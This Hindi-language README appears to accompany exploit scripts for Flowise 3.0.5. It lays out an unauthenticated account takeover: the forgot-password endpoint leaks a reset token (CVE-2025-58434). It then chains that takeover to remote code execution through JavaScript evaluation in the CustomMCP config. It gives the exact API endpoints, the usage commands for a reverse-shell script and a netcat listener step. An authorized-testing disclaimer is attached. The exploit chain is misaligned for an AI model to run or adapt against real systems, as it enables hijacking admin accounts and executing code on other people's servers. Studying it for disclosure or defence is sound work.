
# Flowise 3.0.5 के लिए शोषण श्रृंखला: पासवर्ड-रीसेट टोकन प्रकटीकरण (CVE-2025-58434) के माध्यम से बिना प्रमाणीकरण के खाता अधिग्रहण, जो रिमोट कोड निष्पादन के लिए CustomMCP JavaScript मूल्यांकन से जुड़ा हुआ है।
Flowise 3.0.5 की दो समस्याएं, एक साथ जुड़ी हुई:
POST /api/v1/account/forgot-password लक्षित उपयोगकर्ता के tempToken को
सीधे JSON प्रतिक्रिया में लौटाता है। इसे POST /api/v1/account/reset-password
में फीड करें ताकि किसी भी खाते के लिए एक ज्ञात पासवर्ड सेट किया जा सके, जिसमें पहला एडमिन भी शामिल है -> पूर्ण
अनधिकृत खाता अधिग्रहण।mcpServerConfig सर्वर-साइड JavaScript मूल्यांकन।
एक सत्र और वर्कस्पेस API कुंजी (चरण 1 से) के साथ,
POST /api/v1/node-load-method/customMCP जिसमें loadMethod=listActions है,
Flowise प्रक्रिया में mcpServerConfig स्ट्रिंग का JavaScript के रूप में मूल्यांकन करता है,
जिससे require('child_process').exec() RCE प्राप्त होता है। (यहां केवल ATO को कोड निष्पादन में बदलने के लिए उपयोग की गई अलग Flowise समस्या; लेखन के समय कोई CVE निर्दिष्ट नहीं है।)CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - पूर्ण श्रृंखला (ATO -> API कुंजी -> CustomMCP रिवर्स शेल)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# `nc -lvnp <LPORT>` तैयार रखें
flowise_customMCP_rce.py - केवल CustomMCP RCE (API कुंजी की आवश्यकता है)python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'
केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसे केवल उन्हीं सिस्टमों के विरुद्ध चलाएं जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
लेखक: r3vpwnx